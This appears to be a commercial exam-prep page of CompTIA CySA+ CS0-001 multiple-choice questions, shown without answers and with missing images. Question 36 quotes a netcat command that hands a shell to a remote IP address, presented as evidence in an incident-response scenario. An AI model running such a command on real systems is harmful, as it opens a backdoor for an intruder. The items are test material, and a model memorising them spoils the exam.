March Sale Special - 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: c4sdisc65

Note! CS0-001 has been withdrawn. The new exam code is CS0-002

CS0-001 CompTIA CySA+ Certification Exam Questions and Answers

Question # 6

A security analyst wants to scan the network for active hosts. Which of the following host characteristics help to differentiate between a virtual and physical host?

A.

Reserved MACs

B.

Host IPs

C.

DNS routing tables

D.

Gateway settings

Full Access
Question # 7

A cybersecurity analyst was hired to resolve a security issue within a company after it was reported that many employee account passwords had been compromised. Upon investigating the incident, the cybersecurity analyst found that a brute force attack was launched against the company.

Which of the following remediation actions should the cybersecurity analyst recommend to senior management to address these security issues?

A.

Prohibit password reuse using a GPO.

B.

Deploy multifactor authentication.

C.

Require security awareness training.

D.

Implement DLP solution.

Full Access
Question # 8

A security analyst is attempting to configure a vulnerability scan for a new segment on the network. Given the requirement to prevent credentials from traversing the network while still conducting a credentialed scan, which of the following is the BEST choice?

A.

Install agents on the endpoints to perform the scan

B.

Provide each endpoint with vulnerability scanner credentials

C.

Encrypt all of the traffic between the scanner and the endpoint

D.

Deploy scanners with administrator privileges on each endpoint

Full Access
Question # 9

A company has several internal-only, web-based applications on the internal network. Remote employees are allowed to connect to the internal corporate network with a company-supplied VPN client. During a project to upgrade the internal application, contractors were hired to work on a database server and were given copies of the VPN client so they could work remotely. A week later, a security analyst discovered an internal web-server had been compromised by malware that originated from one of the contractor’s laptops. Which of the following changes should be made to BEST counter the threat presented in this scenario?

A.

Create a restricted network segment for contractors, and set up a jump box for the contractors to use to access internal resources.

B.

Deploy a web application firewall in the DMZ to stop Internet-based attacks on the web server.

C.

Deploy an application layer firewall with network access control lists at the perimeter, and then create alerts for suspicious Layer 7 traffic.

D.

Require the contractors to bring their laptops on site when accessing the internal network instead of using the VPN from a remote location.

E.

Implement NAC to check for updated anti-malware signatures and location-based rules for PCs connecting to the internal network.

Full Access
Question # 10

After reviewing the following packet, a cybersecurity analyst has discovered an unauthorized service is running on a company’s computer.

CS0-001 question answer

Which of the following ACLs, if implemented, will prevent further access ONLY to the unauthorized service and will not impact other services?

A.

DENY TCP ANY HOST 10.38.219.20 EQ 3389

B.

DENY IP HOST 10.38.219.20 ANY EQ 25

C.

DENY IP HOST192.168.1.10 HOST 10.38.219.20 EQ 3389

D.

DENY TCP ANY HOST 192.168.1.10 EQ 25

Full Access
Question # 11

Creating a lessons learned report following an incident will help an analyst to communicate which of the following information? (Select TWO)

A.

Root cause analysis of the incident and the impact it had on the organization

B.

Outline of the detailed reverse engineering steps for management to review

C.

Performance data from the impacted servers and endpoints to report to management

D.

Enhancements to the policies and practices that will improve business responses

E.

List of IP addresses, applications, and assets

Full Access
Question # 12

A security analyst is performing a review of Active Directory and discovers two new user accounts in the accounting department. Neither of the users has elevated permissions, but accounts in the group are given access to the company’s sensitive financial management application by default. Which of the following is the BEST course of action?

A.

Follow the incident response plan for the introduction of new accounts

B.

Disable the user accounts

C.

Remove the accounts’ access privileges to the sensitive application

D.

Monitor the outbound traffic from the application for signs of data exfiltration

E.

Confirm the accounts are valid and ensure role-based permissions are appropriate

Full Access
Question # 13

A cybersecurity professional typed in a URL and discovered the admin panel for the e-commerce application is accessible over the open web with the default password. Which of the following is the MOST secure solution to remediate this vulnerability?

A.

Rename the URL to a more obscure name, whitelist all corporate IP blocks, and require two-factor authentication.

B.

Change the default password, whitelist specific source IP addresses, and require two-factor authentication.

C.

Whitelist all corporate IP blocks, require an alphanumeric passphrase for the default password, and require two-factor authentication.

D.

Change the username and default password, whitelist specific source IP addresses, and require two-factor authentication.

Full Access
Question # 14

A software assurance lab is performing a dynamic assessment on an application by automatically generating and inputting different, random data sets to attempt to cause an error/failure condition. Which of the following software assessment capabilities is the lab performing AND during which phase of the SDLC should this occur? (Select two.)

A.

Fuzzing

B.

Behavior modeling

C.

Static code analysis

D.

Prototyping phase

E.

Requirements phase

F.

Planning phase

Full Access
Question # 15

An analyst wants to use a command line tool to identify open ports and running services on a host along with the application that is associated with those services and port. Which of the following should the analyst use?

A.

Wireshark

B.

Qualys

C.

netstat

D.

nmap

E.

ping

Full Access
Question # 16

Review the following results:

CS0-001 question answer

Which of the following has occurred?

A.

This is normal network traffic.

B.

123.120.110.212 is infected with a Trojan.

C.

172.29.0.109 is infected with a worm.

D.

172.29.0.109 is infected with a Trojan.

Full Access
Question # 17

An executive tasked a security analyst to aggregate past logs, traffic, and alerts on a particular attack vector. The analyst was then tasked with analyzing the data and making predictions on future complications regarding this attack vector. Which of the following types of analysis is the security analyst MOST likely conducting?

A.

Trend analysis

B.

Behavior analysis

C.

Availability analysis

D.

Business analysis

Full Access
Question # 18

A systems administrator is trying to secure a critical system. The administrator has placed the system behind a firewall, enabled strong authentication, and required all administrators of this system to attend mandatory training.

Which of the following BEST describes the control being implemented?

A.

Audit remediation

B.

Defense in depth

C.

Access control

D.

Multifactor authentication

Full Access
Question # 19

Which of the following are essential components within the rules of engagement for a penetration test? (Select TWO).

A.

Schedule

B.

Authorization

C.

List of system administrators

D.

Payment terms

E.

Business justification

Full Access
Question # 20

A red team actor observes it is common practice to allow cell phones to charge on company computers, but access to the memory storage is blocked. Which of the following are common attack techniques that take advantage of this practice? (Choose two.)

A.

A USB attack that tricks the computer into thinking the connected device is a keyboard, and then sends characters one at a time as a keyboard to launch the attack (a prerecorded series of keystrokes)

B.

A USB attack that turns the connected device into a rogue access point that spoofs the configured wireless SSIDs

C.

A Bluetooth attack that modifies the device registry (Windows PCs only) to allow the flash drive to mount, and then launches a Java applet attack

D.

A Bluetooth peering attack called “Snarfing” that allows Bluetooth connections on blocked device types if physically connected to a USB port

E.

A USB attack that tricks the system into thinking it is a network adapter, then runs a user password hash gathering utility for offline password cracking

Full Access
Question # 21

During the forensic phase of a security investigation, it was discovered that an attacker was able to find private keys on a poorly secured team shared drive. The attacker used those keys to intercept and decrypt sensitive traffic on a web server. Which of the following describes this type of exploit and the potential remediation?

A.

Session hijacking; network intrusion detection sensors

B.

Cross-site scripting; increased encryption key sizes

C.

Man-in-the-middle; well-controlled storage of private keys

D.

Rootkit; controlled storage of public keys

Full Access
Question # 22

A threat intelligence analyst who works for a financial services firm received this report:

“There has been an effective waterhole campaign residing at www.bankfinancecompsoftware.com. This domain is delivering ransomware. This ransomware variant has been called “LockMaster” by researchers due to its ability to overwrite the MBR, but this term is not a malware signature. Please execute a defensive operation regarding this attack vector.”

The analyst ran a query and has assessed that this traffic has been seen on the network. Which of the following actions should the analyst do NEXT? (Select TWO).

A.

Advise the firewall engineer to implement a block on the domain

B.

Visit the domain and begin a threat assessment

C.

Produce a threat intelligence message to be disseminated to the company

D.

Advise the security architects to enable full-disk encryption to protect the MBR

E.

Advise the security analysts to add an alert in the SIEM on the string “LockMaster”

F.

Format the MBR as a precaution

Full Access
Question # 23

Alerts have been received from the SIEM, indicating infections on multiple computers. Based on threat characteristics, these files were quarantined by the host-based antivirus program. At the same time, additional alerts in the SIEM show multiple blocked URLs from the address of the infected computers; the URLs were classified as uncategorized. The domain location of the IP address of the URLs that were blocked is checked, and it is registered to an ISP in Russia. Which of the following steps should be taken NEXT?

A.

Remove those computers from the network and replace the hard drives. Send the infected hard drives out for investigation.

B.

Run a full antivirus scan on all computers and use Splunk to search for any suspicious activity that happened just before the alerts were received in the SIEM.

C.

Run a vulnerability scan and patch discovered vulnerabilities on the next pathing cycle. Have the users restart their computers. Create a use case in the SIEM to monitor failed logins on the infected computers.

D.

Install a computer with the same settings as the infected computers in the DMZ to use as a honeypot. Permit the URLs classified as uncategorized to and from that host.

Full Access
Question # 24

A cybersecurity analyst has several log files to review. Instead of using grep and cat commands, the analyst decides to find a better approach to analyze the logs. Given a list of tools, which of the following would provide a more efficient way for the analyst to conduct a timeline analysis, do keyword searches, and output a report?

A.

Kali

B.

Splunk

C.

Syslog

D.

OSSIM

Full Access
Question # 25

A company invested ten percent of its entire annual budget in security technologies. The Chief Information Officer (CIO) is convinced that, without this investment, the company will risk being the next victim of the same cyber attack its competitor experienced three months ago. However, despite this investment, users are sharing their usernames and passwords with their coworkers to get their jobs done. Which of the following will eliminate the risk introduced by this practice?

A.

Invest in and implement a solution to ensure non-repudiation

B.

Force a daily password change

C.

Send an email asking users not to share their credentials

D.

Run a report on all users sharing their credentials and alert their managers of further actions

Full Access
Question # 26

Which of the following stakeholders would need to be aware of an e-discovery notice received by the security office about an ongoing case within the manufacturing department?

A.

Board of trustees

B.

Human resources

C.

Legal

D.

Marketing

Full Access
Question # 27

During a review of security controls, an analyst was able to connect to an external, unsecured FTP server from a workstation. The analyst was troubleshooting and reviewed the ACLs of the segment firewall the workstation is connected to:

CS0-001 question answer

Based on the ACLs above, which of the following explains why the analyst was able to connect to the FTP server?

A.

FTP was explicitly allowed in Seq 8 of the ACL.

B.

FTP was allowed in Seq 10 of the ACL.

C.

FTP was allowed as being included in Seq 3 and Seq 4 of the ACL.

D.

FTP was allowed as being outbound from Seq 9 of the ACL.

Full Access
Question # 28

A cybersecurity analyst is reviewing the following outputs:

CS0-001 question answer

Which of the following can the analyst infer from the above output?

A.

The remote host is redirecting port 80 to port 8080.

B.

The remote host is running a service on port 8080.

C.

The remote host’s firewall is dropping packets for port 80.

D.

The remote host is running a web server on port 80.

Full Access
Question # 29

A SIEM analyst noticed a spike in activities from the guest wireless network to several electronic health record (EHR) systems. After further analysis, the analyst discovered that a large volume of data has been uploaded to a cloud provider in the last six months. Which of the following actions should the analyst do FIRST?

A.

Contact the Office of Civil Rights (OCR) to report the breach

B.

Notify the Chief Privacy Officer (CPO)

C.

Activate the incident response plan

D.

Put an ACL on the gateway router

Full Access
Question # 30

A security analyst is concerned that unauthorized users can access confidential data stored in the production server environment. All workstations on a particular network segment have full access to any server in production. Which of the following should be deployed in the production environment to prevent unauthorized access? (Choose two.)

A.

DLP system

B.

Honeypot

C.

Jump box

D.

IPS

E.

Firewall

Full Access
Question # 31

An audii has revealed that the database administrator also responsible for auditing database changes and backup logs. Which of the following access control methodologies would BEST mitigate this concern?

A.

Time-of-day restriction

B.

Separation of duties

C.

Principle of least privilege

D.

Role-based access control

Full Access
Question # 32

A security administrator must prioritize the latest vulnerability scan results for remediation. According to the common vulnerability scoring system, which of the following vulnerability scores Is considered to have a HIGH severity?

A.

5.4

B.

6.7

C.

7.9

D.

10

Full Access
Question # 33

A cyber-incident response team is responding to a network intrusion incident on a hospital network. Which of the following must the team prepare to allow the data to be used in court as evidence?

A.

Computer forensics form

B.

HIPAA response form

C.

Chain of custody form

D.

Incident form

Full Access
Question # 34

An analyst is detecting Linux machines on a Windows network. Which of the following tools should be used to detect a computer operating system?

A.

whois

B.

netstat

C.

nmap

D.

nslookup

Full Access
Question # 35

A small company Is publishing a new web application to receive customer feedback related to Its products. The web server will only host a form to receive the customer feedback and store It In a local database. The web server is placed In a DMZ network, and the web service and filesystem have been hardened. However, the cybersecurity analyst discovers data from the database can be mined from over the Internet. Which of the following should the cybersecurity analyst recommend be done to provide temporary mitigation from unauthorized access to the database?

A.

Configure the database to listen for Incoming connections on the Internal network.

B.

Change the database connection string and apply necessary patches.

C.

Configure an ACL in the border firewall to block all connections to the web server for ports different than 80 and 443.

D.

Deploy a web application firewall to protect the web application from attacks to the database.

Full Access
Question # 36

A security analyst is investigating the possible compromise of a production server for the company’s public-facing portal. The analyst runs a vulnerability scan against the server and receives the following output:

CS0-001 question answer

In some of the portal’s startup command files, the following command appears:

nc –o /bin/sh 72.14.1.36 4444

Investigating further, the analyst runs Netstat and obtains the following output

CS0-001 question answer

Which of the following is the best step for the analyst to take NEXT?

A.

Initiate the security incident response process

B.

Recommend training to avoid mistakes in production command files

C.

Delete the unknown files from the production servers

D.

Patch a new vulnerability that has been discovered

E.

Manually review the robots .txt file for errors

Full Access
Question # 37

Now regulations have come out that require a company to conduct regular vulnerability scans. Not wanting to be found with a vulnerability during an audit, the company wants the most accurate and complete vulnerability scan. Which of the following BEST meets this objective?

A.

Regression scan

B.

Port scan

C.

SCAP scan

D.

Agent-based scan

Full Access
Question # 38

Joe, a user, is unable to launch an application on his laptop, which he typically uses on a daily basis. Joe informs a security analyst of the issue. After an online database comparison, the security analyst checks the SIEM and notices alerts indicating certain .txt and .dll files are blocked. Which of the following tools would generate these logs?

A.

Antivirus

B.

HIPS

C.

Firewall

D.

Proxy

Full Access
Question # 39

A list of vulnerabilities has been reported in a company’s most recent scan of a server. The security analyst must review the vulnerabilities and decide which ones should be remediated in the next change window and which ones can wait or may not need patching. Pending further investigation. Which of the following vulnerabilities should the analyst remediate FIRST?

A.

The analyst should remediate https (443/tcp) first. This web server is susceptible to banner grabbing and was fingerprinted as Apache/1.3.27-9 on Linux w/ mod_fastcgi.

B.

The analyst should remediate dns (53/tcp) first. The remote BIND 9 DNS server is susceptible to a buffer overflow, which may allow an attacker to gain a shell on this host or disable this server.

C.

The analyst should remediate imaps (993/tcp) first. The SSLv2 suite offers five strong ciphers and two weak “export class” ciphers.

D.

The analyst should remediate ftp (21/tcp) first. An outdated version of FTP is running on this port. If it is not in use, it should be disabled.

Full Access
Question # 40

A vulnerability analyst needs to identify all systems with unauthorized web servers on the 10.1.1.0/24 network. The analyst uses the following default Nmap scan:

nmap –sV –p 1-65535 10.1.1.0/24

Which of the following would be the result of running the above command?

A.

This scan checks all TCP ports.

B.

This scan probes all ports and returns open ones.

C.

This scan checks all TCP ports and returns versions.

D.

This scan identifies unauthorized servers.

Full Access
Question # 41

A company provides wireless connectivity to the internal network from all physical locations for company-owned devices. Users were able to connect the day before, but now all users have reported that when they connect to an access point in the conference room, they cannot access company resources. Which of the following BEST describes the cause of the problem?

A.

The access point is blocking access by MAC address. Disable MAC address filtering.

B.

The network is not available. Escalate the issue to network support.

C.

Expired DNS entries on users’ devices. Request the affected users perform a DNS flush.

D.

The access point is a rogue device. Follow incident response procedures.

Full Access
Question # 42

A security analyst discovers a network intrusion and quickly solves the problem by closing an unused port. Which of the following should be completed?

A.

Vulnerability report

B.

Memorandum of agreement

C.

Reverse-engineering incident report

D.

Lessons learned report

Full Access
Question # 43

Company A’s security policy states that only PKI authentication should be used for all SSH accounts. A security analyst from Company A is reviewing the following auth.log and configuration settings:

CS0-001 question answer

Which of the following changes should be made to the following sshd_config file to establish compliance with the policy?

A.

Change PermitRootLogin no to #PermitRootLogin yes

B.

Change ChallengeResponseAuthentication yes to ChallangeResponseAuthentication no

C.

Change PubkeyAuthentication yes to #PubkeyAuthentication yes

D.

Change #AuthorizedKeysFile sh/.ssh/authorized_keys to AuthorizedKeysFile sh/.ssh/authorized_keys

E.

Change PassworAuthentication yes to PasswordAuthentication no

Full Access
Question # 44

A company has implemented WPA2, a 20-character minimum for the WiFi passphrase, and a new WiFi passphrase every 30 days, and has disabled SSID broadcast on all wireless access points. Which of the following is the company trying to mitigate?

A.

Downgrade attacks

B.

Rainbow tables

C.

SSL pinning

D.

Forced deauthentication

Full Access
Question # 45

A security analyst Is trying to capture network traffic In a web server that is suspected of using the DNS service for exfiltrating Information out of the network. The server usually transfers several gigabytes of data per day. and the analyst wants the size of the capture to be as reduced as possible. Which of the following commands should the analyst use to achieve such goals?

A.

tcpdump tcp port 53 -i eth0 -w evidencel.pcap

B.

tcpdump udp port 53 -i eth0 -w evidencel.pcap

C.

tcpdump port 53 -i eth0 -w evidencel.pcap

D.

tcpdump -i echo -w evidencel.pcap

Full Access
Question # 46

The human resources division is moving all of its applications to an IaaS cloud. The Chief Information Officer (CIO) has asked the security architect to design the environment securely to prevent the IaaS provider from accessing its data-at-rest and data-in-transit within the infrastructure. Which of the following security controls should the security architect recommend?

A.

Implement a non-data breach agreement

B.

Ensure all backups are remote outside the control of the IaaS provider

C.

Ensure all of the IaaS provider’s workforce passes stringent background checks

D.

Render data unreadable through the use of appropriate tools and techniques

Full Access
Question # 47

While reviewing three months of logs, a security analyst notices probes from random company laptops going to SCADA equipment at the company’s manufacturing location. Some of the probes are getting responses from the equipment even though firewall rules are in place, which should block this type of unauthorized activity. Which of the following should the analyst recommend to keep this activity from originating from company laptops?

A.

Implement a group policy on company systems to block access to SCADA networks.

B.

Require connections to the SCADA network to go through a forwarding proxy.

C.

Update the firewall rules to block SCADA network access from those laptop IP addresses.

D.

Install security software and a host-based firewall on the SCADA equipment.

Full Access
Question # 48

An analyst has informed the Chief Executive Officer (CEO) of a company that a security breach has Just occurred The risk manager was unaware and caught off-guard when the CEO asked for further information. Which of the following should be Implemented to ensure the risk manager Is knowledgeable of any future breaches?

A.

Incident management

B.

Lessons learned report

C.

Chain of custody management

D.

Change control process

Full Access
Question # 49

An organization has recently found some of its sensitive information posted to a social media site. An investigation has identified large volumes of data leaving the network with the source traced back to host 192.168.1.13. An analyst performed a targeted Nmap scan of this host with the results shown below:

CS0-001 question answer

Subsequent investigation has allowed the organization to conclude that all of the well-known, standard ports are secure. Which of the following services is the problem?

A.

winHelper

B.

ssh

C.

rpcbind

D.

timbuktu-serv1

E.

mysql

Full Access
Question # 50

A hacker issued a command and received the following response:

CS0-001 question answer

Which of the following describes what the hacker is attempting?

A.

Penetrating the system

B.

Performing a zombie scan

C.

OS fingerprinting

D.

Topology discovery

Full Access
Question # 51

A company has monthly scheduled windows for patching servers and applying configuration changes. Out-of-window changes can be done, but they are discouraged unless absolutely necessary. The systems administrator is reviewing the weekly vulnerability scan report that was just released. Which of the following vulnerabilities should the administrator fix without waiting for the next scheduled change window?

A.

The administrator should fix dns (53/tcp). BIND ‘NAMED’ is an open-source DNS server from ISC.org. The BIND-based NAMED server (or DNS servers) allow remote users to query for version and type information.

B.

The administrator should fix smtp (25/tcp). The remote SMTP server is insufficiently protected against relaying. This means spammers might be able to use the company’s mail server to send their emails to the world.

C.

The administrator should fix http (80/tcp). An information leak occurs on Apache web servers with the UserDir module enabled, allowing an attacker to enumerate accounts by requesting access to home directories and monitoring the response.

D.

The administrator should fix http (80/tcp). The ‘greeting.cgi’ script is installed. This CGI has a well-known security flaw that lets anyone execute arbitrary commands with the privileges of the http daemon.

E.

The administrator should fix general/tcp. The remote host does not discard TCP SYN packets that have the FIN flag set. Depending on the kind of firewall a company is using, an attacker may use this flaw to bypass its rules.

Full Access
Question # 52

A security analyst has concluded that suspicious Intermittent network activity Is coming from one or more systems using random IP addresses and MAC addresses. The same IP or MAC address Is not used twice Which of the following Is the BEST course of action to Identify the source of the suspicious activity when It resumes?

A.

Configure a dynamic sinkhole.

B.

Review the firewall logs.

C.

Trace down to the switchport

D.

Review the network IDS logs.

Full Access
Question # 53

A corporation has implemented an 802.1X wireless network using self-signed certificates. Which of the following represents a risk to wireless users?

A.

Buffer overflow attacks

B.

Cross-site scripting attacks

C.

Man-in-the-middle attacks

D.

Denial of service attacks

Full Access
Question # 54

A web application has a newly discovered vulnerability in the authentication method used to validate known company users. The user ID of Admin with a password of “password” grants elevated access to the application over the Internet. Which of the following is the BEST method to discover the vulnerability before a production deployment?

A.

Manual peer review

B.

User acceptance testing

C.

Input validation

D.

Stress test the application

Full Access
Question # 55

A security analyst received a compromised workstation. The workstation’s hard drive may contain evidence of criminal activities. Which of the following is the FIRST thing the analyst must do to ensure the integrity of the hard drive while performing the analysis?

A.

Make a copy of the hard drive.

B.

Use write blockers.

C.

Run rm –R command to create a hash.

D.

Install it on a different machine and explore the content.

Full Access
Question # 56

A security professional is analyzing the results of a network utilization report. The report includes the following information:

CS0-001 question answer

Which of the following servers needs further investigation?

A.

hr.dbprod.01

B.

R&D.file.srvr.01

C.

mrktg.file.srvr.02

D.

web.srvr.03

Full Access
Question # 57

Using a heuristic system to detect an anomaly in a computer’s baseline, a system administrator was able to detect an attack even though the company signature based IDS and antivirus did not detect it. Further analysis revealed that the attacker had downloaded an executable file onto the company PC from the USB port, and executed it to trigger a privilege escalation flaw. Which of the following attacks has MOST likely occurred?

A.

Cookie stealing

B.

Zero-day

C.

Directory traversal

D.

XML injection

Full Access
Question # 58

A company wants to update its acceptable use policy (AUP) to ensure it relates to the newly implemented password standard, which requires sponsored authentication of guest wireless devices. Which of the following is MOST likely to be incorporated in the AUP?

A.

Sponsored guest passwords must be at least ten characters in length and contain a symbol.

B.

The corporate network should have a wireless infrastructure that uses open authentication standards.

C.

Guests using the wireless network should provide valid identification when registering their wireless devices.

D.

The network should authenticate all guest users using 802.1x backed by a RADIUS or LDAP server.

Full Access
Question # 59

A security analyst suspects that a workstation may be beaconing to a command and control server. Inspect the logs from the company’s web proxy server and the firewall to determine the best course of action to take in order to neutralize the threat with minimum impact to the organization.

Instructions:

Modify the firewall ACL, using the Firewall ACL form to mitigate the issue.

If at any time you would like to bring back the initial state of the simulation, please select the Reset All button.

CS0-001 question answer

Full Access
Question # 60

After scanning the main company’s website with the OWASP ZAP tool, a cybersecurity analyst is reviewing the following warning:

CS0-001 question answer

The analyst reviews a snippet of the offending code:

CS0-001 question answer

Which of the following is the BEST course of action based on the above warning and code snippet?

A.

The analyst should implement a scanner exception for the false positive.

B.

The system administrator should disable SSL and implement TLS.

C.

The developer should review the code and implement a code fix.

D.

The organization should update the browser GPO to resolve the issue.

Full Access
Question # 61

An administrator has been investigating the way in which an actor had been exfiltrating confidential data from a web server to a foreign host. After a thorough forensic review, the administrator determined the server’s BIOS had been modified by rootkit installation. After removing the rootkit and flashing the BIOS to a known good state, which of the following would BEST protect against future adversary access to the BIOS, in case another rootkit is installed?

A.

Anti-malware application

B.

Host-based IDS

C.

TPM data sealing

D.

File integrity monitoring

Full Access
Question # 62

An analyst has initiated an assessment of an organization’s security posture. As a part of this review, the analyst would like to determine how much information about the organization is exposed externally. Which of the following techniques would BEST help the analyst accomplish this goal? (Select two.)

A.

Fingerprinting

B.

DNS query log reviews

C.

Banner grabbing

D.

Internet searches

E.

Intranet portal reviews

F.

Sourcing social network sites

G.

Technical control audits

Full Access
Question # 63

A security analyst is reviewing IDS logs and notices the following entry:

CS0-001 question answer

Which of the following attacks is occurring?

A.

Cross-site scripting

B.

Header manipulation

C.

SQL injection

D.

XML injection

Full Access
Question # 64

A security analyst has determined that the user interface on an embedded device is vulnerable to common SQL injections. The device is unable to be replaced, and the software cannot be upgraded. Which of the following should the security analyst recommend to add additional security to this device?

A.

The security analyst should recommend this device be placed behind a WAF.

B.

The security analyst should recommend an IDS be placed on the network segment.

C.

The security analyst should recommend this device regularly export the web logs to a SIEM system.

D.

The security analyst should recommend this device be included in regular vulnerability scans.

Full Access
Question # 65

Which of the following items represents a document that includes detailed information on when an incident was detected, how impactful the incident was, and how it was remediated, in addition to incident response effectiveness and any identified gaps needing improvement?

A.

Forensic analysis report

B.

Chain of custody report

C.

Trends analysis report

D.

Lessons learned report

Full Access
Question # 66

A security analyst has been asked to remediate a server vulnerability. Once the analyst has located a patch for the vulnerability, which of the following should happen NEXT?

A.

Start the change control process.

B.

Rescan to ensure the vulnerability still exists.

C.

Implement continuous monitoring.

D.

Begin the incident response process.

Full Access
Question # 67

While a threat intelligence analyst was researching an indicator of compromise on a search engine, the web proxy generated an alert regarding the same indicator. The threat intelligence analyst states that related sites were not visited but were searched for in a search engine. Which of the following MOST likely happened in this situation?

A.

The analyst is not using the standard approved browser.

B.

The analyst accidently clicked a link related to the indicator.

C.

The analyst has prefetch enabled on the browser in use.

D.

The alert in unrelated to the analyst’s search.

Full Access
Question # 68

Company A permits visiting business partners from Company B to utilize Ethernet ports available in Company A’s conference rooms. This access is provided to allow partners the ability to establish VPNs back to Company B’s network. The security architect for Company A wants to ensure partners from Company B are able to gain direct Internet access from available ports only, while Company A employees can gain access to the Company A internal network from those same ports. Which of the following can be employed to allow this?

A.

ACL

B.

SIEM

C.

MAC

D.

NAC

E.

SAML

Full Access